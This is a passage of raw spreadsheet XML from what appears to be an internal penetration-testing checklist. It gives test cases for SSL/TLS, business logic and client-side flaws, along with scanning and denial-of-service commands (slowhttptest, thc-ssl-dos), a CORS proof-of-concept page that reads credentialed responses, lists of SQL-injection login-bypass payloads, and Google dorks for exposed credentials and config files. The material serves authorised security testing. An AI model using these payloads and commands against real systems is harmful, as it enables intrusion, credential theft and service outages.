</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">• </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Server should be protected from BEAST Attack 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">• </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Server should be protected from CRIME attack, TLS compression must be disabled 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">• </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Server should support Forward Secrecy 
Test for Surf Jacking if possible when both HTTP and HTTPS are enabled on the site.                                                                                        
Configuration Review- on host system(if allowed to access)    </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">
Use testssl.sh by installing the latest version from GitHub
https://github.com/drwetter/testssl.sh.git
Nessus, Nmap, Shell script in connections. 
Sometimes the SSL/TLS enabled service is not directly accessible and the tester can access it only via a HTTP proxy using CONNECT Method. Typically tcp ports with SSL for web and mail services are - but not limited to - 443 (https), 465 (ssmtp), 585 (imap4-ssl), 993 (imaps), 995 (ssl-pop).
nmap -sV --reason -PN -n –top-ports     nmap --script ssl-cert,ssl-enum-ciphers -p 443,465,993,995                 
Checking for Client-initiated Renegotiation and Secure Renegotiation via openssl (manually) 
openssl s_client -connect &lt;hostname&gt;:443  After cleint handshake—type HEAD / HTTP/1.1          R                                  
if you get server  side response as “Renegotiating” then it is vulnerable. Testing supported Cipher Suites, BEAST and CRIME attacks via TestSSLServer. Testsl.sh script, ssl breacher for comprehensive ssl test</t>
  </si>
  <si>
    <t>Install the latest testssl script of version from GitHub
https://github.com/drwetter/testssl.sh.git</t>
  </si>
  <si>
    <t>SSL/TLS Issues</t>
  </si>
  <si>
    <t>PTC-PEN-CRID-0002</t>
  </si>
  <si>
    <t xml:space="preserve">			Poodle
			Logjam
			BEAST</t>
  </si>
  <si>
    <t>Use testssl.sh by installing the latest version from GitHub_x000D_
https://github.com/drwetter/testssl.sh.git</t>
  </si>
  <si>
    <t>Padding Oracle</t>
  </si>
  <si>
    <t>PTC-PEN-CRID-0003</t>
  </si>
  <si>
    <r>
      <t>1.The data is encrypted. Good candidates are values which appear
to be random.
2.</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>A block cipher is used. The length of the decoded (Base64 is used often) cipher text is a multiple of common cipher block sizes like 8 or 16 bytes. Different cipher texts (e.g. gathered by different sessions or manipulation of session state) share a common divisor in the length</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">PadBuster - https://github.com/GDSSecurity/PadBusterhttp://netifera.com/research/  </t>
  </si>
  <si>
    <t>Client-side storage</t>
  </si>
  <si>
    <t>PTC-PEN-CRID-0004</t>
  </si>
  <si>
    <t>Sensitive info management over client-side and transport layer</t>
  </si>
  <si>
    <t>PTC-PEN-CRID-0005</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1. Test if sensitive information used in authentication (e.g. Credentials, PINs, Session identifiers, Tokens, Cookies…) and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Information protected by laws, regulations or specific organizational policy (e.g. Credit Cards, Customers data) must be sent over HTTPS only                                                                                                     2. Test if Session Cookie use the Secure flag  and some directives is sent to the browser to accept only secure traffic (e.g. HSTS )        
3. Test if the web server exposes the application on both HTTP and HTTPS  or case of mixed HTTP and HTTPS resources in the same Page</t>
    </r>
  </si>
  <si>
    <t>WebApp - Business Logic Bypass</t>
  </si>
  <si>
    <t>Business Data validation</t>
  </si>
  <si>
    <t>PTC-PEN-BLID-0001</t>
  </si>
  <si>
    <t xml:space="preserve">1. Perform front-end GUI testing on the application to ensure that the only "valid" values are accepted.                                  
2. Using an intercepting proxy observe request and look for places that variables (parameters) are passed.                        
3. Once variables are found start fuzzing the field with logically "invalid" data, such as unique identifiers that do not exist or that do not fit the business logic.                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">The Application should function properly and should not throw exception / reveal sensitive information / Crash / perform unintended operations. </t>
  </si>
  <si>
    <t>Forge/repeate requests violating business logic</t>
  </si>
  <si>
    <t>PTC-PEN-BLID-0002</t>
  </si>
  <si>
    <t xml:space="preserve">1.Using an intercepting proxy observe the Request / Response look for some indication that values are incrementing at a regular interval or are easily guessable.
• If it is found that some value is guessable this value may be changed and one may gain unexpected visibility and / or
• Using an intercepting proxy observe the Request / Response look for some indication of hidden features such as debug that can be switched on or activated.  If any are found try to guess and change these values to get a different application response or behavior. </t>
  </si>
  <si>
    <t>The forged requests should not allow subvention of programmatic or business logic flow by invoking “hidden” features or functionality such as debugging.</t>
  </si>
  <si>
    <t>Integrity and timing</t>
  </si>
  <si>
    <t>PTC-PEN-BLID-0003</t>
  </si>
  <si>
    <t xml:space="preserve">Specific Testing Method 1
• Using a proxy capture and HTTP traffic look for hidden fields.
• If a hidden field is found see how these fields compare with the GUI application and start interrogating this value through the proxy by submitting different data values trying to circumvent the business process and manipulate values you were not intended to have access to.
Specific Testing Method 2
• Using a proxy capture and HTTP traffic look a place to insert information into areas of the application that are non-editable.
• If it is found, compare these fields with the GUI application and start fuzzing this value through the proxy by submitting different data values trying to circumvent the business process and manipulate values you were not intended to have access to.
Specific Testing Method 3
• Observe the response time for successful and unsuccessful actions, and see if attacker can use this timing for exploitation. 
Example
Suppose a e-commerce site allows users to make purchases with a price quote based on market price at the time they log on. What if an attacker logs on and places an order but does not complete the transaction until later in the day only of the price of the metals goes up? Will the attacker get the initial lower price? </t>
  </si>
  <si>
    <t>Based on functional walkthrough, identify critical areas and test</t>
  </si>
  <si>
    <t>Workflow bypass</t>
  </si>
  <si>
    <t>PTC-PEN-BLID-0004</t>
  </si>
  <si>
    <t>Workflow vulnerabilities involve any type of vulnerability that allows the attacker to misuse an application/system in a way that will allow them to circumvent (not follow) the designed/intended workflow.
The application’s business logic must require that the user complete specific steps in the correct/specific order and if the workflow is terminated without correctly completing, all actions and spawned actions are “rolled back” or canceled. Vulnerabilities related to the circumvention of workflows or bypassing the correct business logic workflow are unique in that they are very application/system specific and careful manual misuse cases must be developed using requirements and use cases.</t>
  </si>
  <si>
    <t>Identify workflow areas and try to hack</t>
  </si>
  <si>
    <t>WebApp - Client-side Vulnerabilities</t>
  </si>
  <si>
    <t>DOM XSS</t>
  </si>
  <si>
    <t>PTC-PEN-CVID-0001</t>
  </si>
  <si>
    <t xml:space="preserve">1. Check if the value of parameter being passed to request is coming from client side. E.g 
(I) name = document.url.substring
(ii) url = window.location/document.location
2. Identify if the value, passes directly or with sanitization
3. Insert XSS vector accordingly and check if the vector gets executed </t>
  </si>
  <si>
    <t>Client-side URL redirection</t>
  </si>
  <si>
    <t>PTC-PEN-CVID-0002</t>
  </si>
  <si>
    <t>1. Identify links/URL's to another page or Web page.
2. For each link/URL, check if the referenced Web page contains code (e.g., meta element or script) that causes a client-side redirect.
3. Verify if redirect is implemented without a time limit or delay and that the page only contains information related to the redirect.                                              
4. Identify DOM Based redirection</t>
  </si>
  <si>
    <t>Bypass client-side validation</t>
  </si>
  <si>
    <t>PTC-PEN-CVID-0003</t>
  </si>
  <si>
    <t>Identify field parameters that are not part of the form and been submitted to the server
1. Identify the inputs where there is client side validations
Eg.,
(I) Inputs which allow only numbers (Not Special characters)
(ii) Freezed email fields
2. Configure an interception tool with browser (Burp suite)
3. Enter a valid input in the field and submit the form
4. Intercept the request and change with an invalid input
5. Submit the request and verify whether the invalid input is accepted</t>
  </si>
  <si>
    <t>Click-jack</t>
  </si>
  <si>
    <t>PTC-PEN-CVID-0005</t>
  </si>
  <si>
    <t>1. Analyze response headers for the critical actions like adding/deleting user etc..
2. Check if X-frame options header is set.
3. Check if frame busting script is being used in the application.
4. Use Burp's Clickbandit feature to take PoC.</t>
  </si>
  <si>
    <t>Sensitive info in local storage</t>
  </si>
  <si>
    <t>PTC-PEN-CVID-0006</t>
  </si>
  <si>
    <t>Sensitive information in cookies, in HTML 5, check local storage 
1. Use Firebug addon in firefox or chrome, to analyze the local storage
2. Verify if any items being stored in local storage is sensitive or not</t>
  </si>
  <si>
    <t xml:space="preserve">Web-socket testing </t>
  </si>
  <si>
    <t>PTC-PEN-CVID-0007</t>
  </si>
  <si>
    <t>(https://www.owasp.org/index.php/Testing_WebSockets_(OTG-CLIENT-010))</t>
  </si>
  <si>
    <t>CORS exploitation</t>
  </si>
  <si>
    <t>PTC-PEN-CVID-0008</t>
  </si>
  <si>
    <t>1. Analyze response headers, and check for “Access-Control-Allow-Origin”
2. If above header is present and set to “*” edit the origin header value to attacker controlled domain (e.g. http://demo.testfire.net) and see whether it is reflected back in Access-Control-Allow-Origin header. 
3. Now look for "Access-Control-Allow-Credentials" header in response. If present and value is set to "true" craft CSRF HTML page and host on your server and go to step 4. If it is not present or value set to false, report with Low severity.
4. Access the crafted page that should make a cross origin request to the target server. 
5. If the submitted request is processed successfully report as per CVSS score. CIA parameters should set as per the nature of the request.</t>
  </si>
  <si>
    <t>&lt;html&gt;
&lt;body&gt;
&lt;button type='button' onclick='cors()'&gt;xxx&lt;/button&gt;
&lt;p id='demo'&gt;&lt;/p&gt;
&lt;p id='session'&gt;&lt;/p&gt;
&lt;script&gt;
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 &amp;&amp; this.status == 200) {
document.getElementById("demo").innerHTML = this.responseText;
parsed = JSON.stringify(this.responseText);
var arr = [];
 for(var x in parsed){
 arr.push(parsed[x]);
 }
 console.log(arr)
 document.getElementById(‘session’).innerHTML = arr[13];
}
};
xhttp.open("GET", "TARGET", true);
xhttp.withCredentials = true;
xhttp.send();
}
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>Browser cache</t>
  </si>
  <si>
    <t>PTC-PEN-CVID-0009</t>
  </si>
  <si>
    <t>1. Login to the application
2. Navigate to a page/tab E.g., My account/Administrator
3. Logout of the application and click on Browser back account
4. Verify whether the previously navigated tab opens and whether it can be updated</t>
  </si>
  <si>
    <t>Content Security Policy:
1. Policy Injection
2. Whitelisted domains
3. Nonce
4. CSP header misconfigurations and verification test case</t>
  </si>
  <si>
    <t>PTC-PEN-CVID-0010</t>
  </si>
  <si>
    <t>1. Policy Injection:
"Check if the parameter values are getting injected into the CSP header (try with payloads like; ABC). If yes, try injecting new directives that could overwrite the existing one and allow you to execute the scripts or load iframes, etc.
Example:
If the XSS payloads are being reflected in the web app but are getting blocked due to CSP header. In that case, policy injection could be a very useful technique. 
https://www.paypal.com/webapps/xoonboarding?values=etc&amp;token=SOMETOKEN;
In the above  testcase if the parameter value token=SOMETOKEN;_ gets injected into the CSP header as shown below. So CSP header directives can be manipulated as the attacker wishes, thus allowing the XSS injected payload to execute.
Content-Security-Policy: default-src 'self' https://*.paypal.com style-src 'self' https://*.paypal.com https://*.paypalobjects.com 'unsafe-inline';img-src https: data:;object-src 'none'; report-uri /webapps/xoonboarding/api/log/csp?token=SOMETOKEN;_"
2. Whitelisted domains
"Check all the domains that are whitelisted such as (*.google. com), and any of them appear to be odd. Also, make sure to check with the product team if all of the domains are required and revise it accordingly by removing the unwanted domains and also by mentioning the specific subdomains if possible.
References(CTF): https://www.compass-demo.com/csp_demo/level6
Example:
default-src 'self'; script-src 'self' https://cutt.ly https://accounts.google.com/secure/
Some other usual whitelisted domians we encounter are:
www.google-analytics.com, *.googleapis.com, *.google-analytics.com, *.google.com,*.yandex.ru, *.gstatic.co, vk.com, mc.yandex.ru, yandex.st,ajax.googleapis.com, *.googlesyndication.com, *.doubleclick.net
In scenarios where domains are whitelisted in the CSP policy directives using wildcards such as *.google.com, which basically allows all the subdomains under google.com. Incase, any of these subdomains are compromised or have some vulnerabilities, these could be chained to bypass the CSP policy in the webapp."
3. Nonce
"Check whether a nonce is implemented. Not every policy need to have this implemented but in an application where the in-line scripts are to be executed for some functionality to be working as expected then the nonce are a must.
Need to check the policy if they are allowing the unsafe-inline, unsafe-eval and then report accordingly if no nonce is used in such scenario.
References: https://www.compass-demo.com/csp_demo/level4
Example:
script-src 'nonce-{RANDOM}' 'strict-dynamic'; object-src 'none'; base-uri 'none';
script-src 'sha256-{HASHED_INLINE_SCRIPT}' 'strict-dynamic'; object-src 'none'; base-uri 'none';
default-src 'self'; script-src 'self' 'nonce-MjIuMDQuMjAyMi8wODoyNg=='"
4. CSP header misconfigurations and verification test case:
1. Analyze the response headers and check for Content Security Policy
2. If the header is set, check if it is properly set 
e.g Content-Security-Policy: script-src 'self' https://apis.google.com
Need to suggest the product team in case of missing this implementation as a recommendation.
Sample usage:
Content-Security-Policy: default-src https:; report-uri /csp-violation-report-endpoint/
The point that has to be considered here before inserting the policy in any tool is that the executioner must be aware of the CSP version implemented by the product team, then we can toggle the tool and can observe some significant changes based on policy</t>
  </si>
  <si>
    <t>BurpSuite
BurpSuite Manual Exploration Required.</t>
  </si>
  <si>
    <t>https://portswigger.net/research/bypassing-csp-with-policy-injection 
https://book.hacktricks.xyz/pentesting-web/content-security-policy-csp-bypass#policy-injection 
https://content-security-policy.com/nonce/ 
https://w3c.github.io/reporting
https://csp-evaluator.withgoogle.com/ 
(supports all version's)
https://www.appsecmonkey.com/tools/csp 
(Only supports CSP-2 but verbose tool)</t>
  </si>
  <si>
    <t>Reflected File Download</t>
  </si>
  <si>
    <t>PTC-PEN-CVID-0012</t>
  </si>
  <si>
    <t xml:space="preserve">Service / Application </t>
  </si>
  <si>
    <t xml:space="preserve">Default Port </t>
  </si>
  <si>
    <t>Test Cases</t>
  </si>
  <si>
    <t>Tools</t>
  </si>
  <si>
    <t>Commands</t>
  </si>
  <si>
    <t>Notes &amp; References</t>
  </si>
  <si>
    <t xml:space="preserve">DNS </t>
  </si>
  <si>
    <t>Domain / Subdomain information gathering</t>
  </si>
  <si>
    <t>dnsmap</t>
  </si>
  <si>
    <t>dnsmap &lt;application domain&gt; -r /testing/bruteforce-results.txt</t>
  </si>
  <si>
    <t>Obtains sub-domains and IP addresses of application domain  and exports them in text format to bruteforce-results.txt</t>
  </si>
  <si>
    <t>Test for SUBDOMAIN TAKEOVER &amp; 2nd order SUBDOMAIN TAKEOVER</t>
  </si>
  <si>
    <t>subjack (github tool)</t>
  </si>
  <si>
    <t>./subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl</t>
  </si>
  <si>
    <t>Reference:
https://www.hackerone.com/blog/Guide-Subdomain-Takeovers
https://github.com/haccer/subjack</t>
  </si>
  <si>
    <t>DNS brute-force for enumerating subdomains and hostnames</t>
  </si>
  <si>
    <t>Metasploit
Nmap</t>
  </si>
  <si>
    <t>use auxiliary/gather/dns_bruteforce
nmap -Pn -sS -p &lt;port no&gt; -sV --version-all -vv --script dns-brute &lt;application domain&gt;</t>
  </si>
  <si>
    <t>HTTP</t>
  </si>
  <si>
    <t>HTTP version information</t>
  </si>
  <si>
    <t>Metasploit 
Nmap
nc
telnet</t>
  </si>
  <si>
    <t>use auxiliary/scanner/http/http_version
nmap -Pn -sS -p &lt;portno&gt; -sV --version-all -vv &lt;application domain&gt;
nc -nv &lt;ipaddr&gt;  &lt;portno&gt;
telnet &lt;ipaddr&gt; &lt;portno&gt;</t>
  </si>
  <si>
    <t>HTTP hidden pages and Directories</t>
  </si>
  <si>
    <t>dirb
dirbuster
nmap</t>
  </si>
  <si>
    <t>dirb http://&lt;ipaddr&gt;:&lt;portno&gt;
nmap -Pn -sS -p 80 --script http-enum &lt;application domain&gt;</t>
  </si>
  <si>
    <t>HTTP server scanner</t>
  </si>
  <si>
    <t>nikto</t>
  </si>
  <si>
    <t>nikto -C all -host http://&lt;application domain&gt;:&lt;portno&gt;</t>
  </si>
  <si>
    <t>Test for HTTP put method</t>
  </si>
  <si>
    <t xml:space="preserve">nc </t>
  </si>
  <si>
    <t>nc -nv &lt;ipaddr&gt; &lt;portno&gt;
PUT /hack HTTP/1.1
host: &lt;ipaddr&gt;</t>
  </si>
  <si>
    <t>HTTP allowed methods</t>
  </si>
  <si>
    <t>Metasploit 
Nmap</t>
  </si>
  <si>
    <t>use auxiliary/scanner/http/options
nmap -Pn -sS -p 80 --script http-methods &lt;application domain&gt;</t>
  </si>
  <si>
    <t>HTTP insecure transport channel</t>
  </si>
  <si>
    <t xml:space="preserve">Wireshark </t>
  </si>
  <si>
    <t>Wireshark filter to be used: "ip.addr==&lt;ipaddr&gt; &amp;&amp; ip.port=&lt;port no&gt;"</t>
  </si>
  <si>
    <t xml:space="preserve">slowloris (READ, HEADER, POST) http DOS </t>
  </si>
  <si>
    <t>slowhttptest
Nmap</t>
  </si>
  <si>
    <t># slowhttptest -c 4096 -i 10 -r 200 -u http://&lt;ip addr/domain&gt;:&lt;port no&gt; -x 24 -p 3 (Slowloris mode)
# slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://&lt;ip addr/domain&gt;:&lt;port no&gt;/someresource -p 5 -l 350 (Slow read) 
# slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u http://mydomain/resources/loginform.html -x 10 -p 3 (SlowPOST)
nmap -Pn -sS -p &lt;portno&gt; -vv --script http-slowloris-check &lt;ipaddr/domain&gt;</t>
  </si>
  <si>
    <t>installing slowhttptest: # apt-get install slowhttptest
for more details: https://www.blackmoreops.com/2015/06/07/attack-website-using-slowhttptest-in-kali-linux/</t>
  </si>
  <si>
    <t>web Application Firewall (WAF)</t>
  </si>
  <si>
    <t>wafw00f</t>
  </si>
  <si>
    <t>wafw00f -u http://&lt;application domain&gt;</t>
  </si>
  <si>
    <t>HTTPS</t>
  </si>
  <si>
    <t xml:space="preserve">Server version information </t>
  </si>
  <si>
    <t>Metasploit
Nmap 
nc
telnet</t>
  </si>
  <si>
    <t>nmap -Pn -sS -p &lt;port no&gt; -vv -T4 -sV --version-all &lt;IP address/domain&gt;
use auxiliary/scanner/http/http_version
nc -nv &lt;IP address&gt; &lt;port no&gt;
telnet &lt;IP address&gt; &lt;port no&gt;</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Note</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>: Enable SSL in msfconsole before running for all SSL related tests 
Example:
msf(auxilliary/server/http/version) &gt;  set SSL TRUE</t>
    </r>
  </si>
  <si>
    <t>HTTP SSL Certificate Information</t>
  </si>
  <si>
    <t>use auxilliary/scanner/http/ssl
nmap -Pn -sS -p &lt;portno&gt; --script ssl-cert -v &lt;ipaddr/domain&gt;</t>
  </si>
  <si>
    <t>dirb/dirbuster
nmap</t>
  </si>
  <si>
    <t>dirb http://&lt;ipaddr&gt;:&lt;portno&gt;
nmap -Pn -sS -p 80 --script http-enum &lt;ipaddr/domain&gt;</t>
  </si>
  <si>
    <t>use auxiliary/scanner/http/options
nmap -Pn -sS -p 80 --script http-methods &lt;ipaddr/domain&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">
installing slowhttptest on ubuntu:
# apt-get install slowhttptest
for more details: https://www.blackmoreops.com/2015/06/07/attack-website-using-slowhttptest-in-kali-linux/</t>
  </si>
  <si>
    <t>Trace Method Enabled (Cross-site tracing)</t>
  </si>
  <si>
    <t>auxiliary/scanner/http/trace
nmap -Pn -sS -p &lt;portno&gt; --script http-trace -v &lt;ipaddr/domain&gt;</t>
  </si>
  <si>
    <t>nikto -C all -host http://&lt;ipaddr/domain&gt;:&lt;portno&gt;</t>
  </si>
  <si>
    <t>Test for ROBOT attack</t>
  </si>
  <si>
    <t>sslyze</t>
  </si>
  <si>
    <t>sslyze --robot &lt;domain/IP&gt;:&lt;port&gt;</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>NOTE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>: please avoid testing  ROBOT attack on testssl since the result is   unreliable</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Scan for  SSL/TLS misconfiguration </t>
  </si>
  <si>
    <t>testssl.sh
sslyze
Nmap</t>
  </si>
  <si>
    <t># bash testssl.sh &lt;ipaddr/domain&gt;:&lt;portno&gt;
sslyze --regular &lt;ipaddr/domain&gt;:&lt;portno&gt;
nmap -Pn -sS -p &lt;portno&gt; --script ssl-enum-ciphers &lt;ipaddr&gt;</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Note:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> Testssl.sh script tests for all known SSL/TLS issues.
Testssl script gets updated regularly, make sure u download and run latest version
Instaling testssl script
# git clone https://github.com/drwetter/testssl.sh.git
# cd testssl.sh</t>
    </r>
  </si>
  <si>
    <t>Secure client-renegotiation</t>
  </si>
  <si>
    <t>openssl
testssl</t>
  </si>
  <si>
    <t>openssl s_client -connect &lt;application domain&gt;:&lt;port&gt;
testssl.sh -R &lt;application domain&gt;</t>
  </si>
  <si>
    <t>Note: Try to renegotiate multiple times, if the renegotiation terminates after three attempts. Possibly it is fixed.</t>
  </si>
  <si>
    <t>thc-ssl-dos(exploitation)</t>
  </si>
  <si>
    <t>./thc-ssl-dos --accept &lt;ip of the application domain&gt; &lt;port&gt;</t>
  </si>
  <si>
    <t>Note: Run the command in two machines simultaneously (9.121.242.148, 9.121.242.149)</t>
  </si>
  <si>
    <t xml:space="preserve"> ' or 1=1--</t>
  </si>
  <si>
    <t xml:space="preserve"> " or 1=1--</t>
  </si>
  <si>
    <t xml:space="preserve"> or 1=1--</t>
  </si>
  <si>
    <t xml:space="preserve"> ' or 'a'='a</t>
  </si>
  <si>
    <t xml:space="preserve"> " or "a"="a</t>
  </si>
  <si>
    <t xml:space="preserve"> ') or ('a'='a</t>
  </si>
  <si>
    <t xml:space="preserve"> ") or ("a"="a</t>
  </si>
  <si>
    <t xml:space="preserve">•admin' -- </t>
  </si>
  <si>
    <t xml:space="preserve">•admin' # </t>
  </si>
  <si>
    <t>•admin'/*</t>
  </si>
  <si>
    <t>•' or 1=1--</t>
  </si>
  <si>
    <t>•' or 1=1#</t>
  </si>
  <si>
    <t>•' or 1=1/*</t>
  </si>
  <si>
    <t>•') or '1'='1--</t>
  </si>
  <si>
    <t>•') or ('1'='1--</t>
  </si>
  <si>
    <t>•....</t>
  </si>
  <si>
    <t xml:space="preserve">•Login as different user (SM*) </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--</t>
  </si>
  <si>
    <t>Injections:</t>
  </si>
  <si>
    <t>) or true--</t>
  </si>
  <si>
    <t>) or ('')=('</t>
  </si>
  <si>
    <t>) or 1--</t>
  </si>
  <si>
    <t>) or ('x')=('</t>
  </si>
  <si>
    <t xml:space="preserve"> " or true--</t>
  </si>
  <si>
    <t xml:space="preserve"> " or ""="</t>
  </si>
  <si>
    <t xml:space="preserve"> " or 1--</t>
  </si>
  <si>
    <t xml:space="preserve"> " or "x"="</t>
  </si>
  <si>
    <t xml:space="preserve"> ") or true--</t>
  </si>
  <si>
    <t xml:space="preserve"> ") or ("")=("</t>
  </si>
  <si>
    <t xml:space="preserve"> ") or 1--</t>
  </si>
  <si>
    <t xml:space="preserve"> ") or ("x")=("</t>
  </si>
  <si>
    <t xml:space="preserve"> ')) or true--</t>
  </si>
  <si>
    <t xml:space="preserve"> ')) or ((''))=(('</t>
  </si>
  <si>
    <t xml:space="preserve"> ')) or 1--</t>
  </si>
  <si>
    <t xml:space="preserve"> ')) or (('x'))=(('</t>
  </si>
  <si>
    <t xml:space="preserve"> '-'</t>
  </si>
  <si>
    <t xml:space="preserve"> ' '</t>
  </si>
  <si>
    <t xml:space="preserve"> '&amp;'</t>
  </si>
  <si>
    <t xml:space="preserve"> '^'</t>
  </si>
  <si>
    <t xml:space="preserve"> '*'</t>
  </si>
  <si>
    <t xml:space="preserve"> ' or ''-'</t>
  </si>
  <si>
    <t xml:space="preserve"> ' or '' '</t>
  </si>
  <si>
    <t xml:space="preserve"> ' or ''&amp;'</t>
  </si>
  <si>
    <t xml:space="preserve"> ' or ''^'</t>
  </si>
  <si>
    <t xml:space="preserve"> ' or ''*'</t>
  </si>
  <si>
    <t xml:space="preserve"> "-"</t>
  </si>
  <si>
    <t xml:space="preserve"> " "</t>
  </si>
  <si>
    <t xml:space="preserve"> "&amp;"</t>
  </si>
  <si>
    <t xml:space="preserve"> "^"</t>
  </si>
  <si>
    <t xml:space="preserve"> "*"</t>
  </si>
  <si>
    <t xml:space="preserve"> " or ""-"</t>
  </si>
  <si>
    <t xml:space="preserve"> " or "" "</t>
  </si>
  <si>
    <t xml:space="preserve"> " or ""&amp;"</t>
  </si>
  <si>
    <t xml:space="preserve"> " or ""^"</t>
  </si>
  <si>
    <t xml:space="preserve"> " or ""*"</t>
  </si>
  <si>
    <t xml:space="preserve"> or true--</t>
  </si>
  <si>
    <t xml:space="preserve"> ' or true--</t>
  </si>
  <si>
    <t xml:space="preserve"> ') or true--</t>
  </si>
  <si>
    <t xml:space="preserve"> ' or 'x'='x</t>
  </si>
  <si>
    <t xml:space="preserve"> ') or ('x')=('x</t>
  </si>
  <si>
    <t xml:space="preserve"> ')) or (('x'))=(('x</t>
  </si>
  <si>
    <t xml:space="preserve"> " or "x"="x</t>
  </si>
  <si>
    <t xml:space="preserve"> ") or ("x")=("x</t>
  </si>
  <si>
    <t xml:space="preserve"> ")) or (("x"))=(("x</t>
  </si>
  <si>
    <t>S. No.</t>
  </si>
  <si>
    <t>Title</t>
  </si>
  <si>
    <t>Google Dork</t>
  </si>
  <si>
    <t xml:space="preserve">Directory Listing </t>
  </si>
  <si>
    <t>site:example.com intitle:index.of</t>
  </si>
  <si>
    <t>Config files</t>
  </si>
  <si>
    <t>site:example.com  ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini</t>
  </si>
  <si>
    <t>Database files and info:</t>
  </si>
  <si>
    <t>db_password filetype:env</t>
  </si>
  <si>
    <t>site:example.com ext:sql | ext:dbf | ext:mdb</t>
  </si>
  <si>
    <t>Log files</t>
  </si>
  <si>
    <t>site:example.com ext:log</t>
  </si>
  <si>
    <t>allintext:&lt;username provided by product team&gt; filetype:log|txt e.g. allintext:cp4dadmin filetype:log</t>
  </si>
  <si>
    <t>Backup &amp; old files</t>
  </si>
  <si>
    <t>site:example.com ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup</t>
  </si>
  <si>
    <t>Login pages</t>
  </si>
  <si>
    <t>site:example.com inurl:login</t>
  </si>
  <si>
    <t>Error pages</t>
  </si>
  <si>
    <t>site:example.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()"</t>
  </si>
  <si>
    <t>intext:"The error was found at" inurl:ibm.com</t>
  </si>
  <si>
    <t>Publicly exposed documents</t>
  </si>
  <si>
    <t>site:example.com ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv</t>
  </si>
  <si>
    <t>PHPInfo()</t>
  </si>
  <si>
    <t>site:example.com ext:php intitle:phpinfo "published by the PHP Group"</t>
  </si>
  <si>
    <t>Get files storing credentials</t>
  </si>
  <si>
    <t>login=* password=* filetype:xls intext:&lt;product name&gt;</t>
  </si>
  <si>
    <t>Subdomain enumeration</t>
  </si>
  <si>
    <t>site:ibm.com - site:www.ibm.com</t>
  </si>
  <si>
    <t>Get info about default usernames and passwords of different IBM products</t>
  </si>
  <si>
    <t>intext:IBM default user ID OR intext:&lt;product_name&gt;</t>
  </si>
  <si>
    <t>Get security scan reports</t>
  </si>
  <si>
    <t>intitle:"report" ("qualys" | "acunetix" | "nessus" | "netsparker" | "nmap") filetype:pdf &lt;product name&gt;</t>
  </si>
  <si>
    <t>Searching for pages containing some info about IBM products:</t>
  </si>
  <si>
    <t>inurl:&lt;product-name&gt; e.g. inurl:redhat.marketplace.com</t>
  </si>
  <si>
    <t>intitle:&lt;product-name&gt; e.g. intitle:cognos analytics</t>
  </si>
  <si>
    <t>inurl:ibm.com &lt;product_name&gt;</t>
  </si>
  <si>
    <t>allinurl:&lt;product name&gt; e.g. allinurl:marketplace.redhat.com</t>
  </si>
  <si>
    <t>cache:example.com</t>
  </si>
  <si>
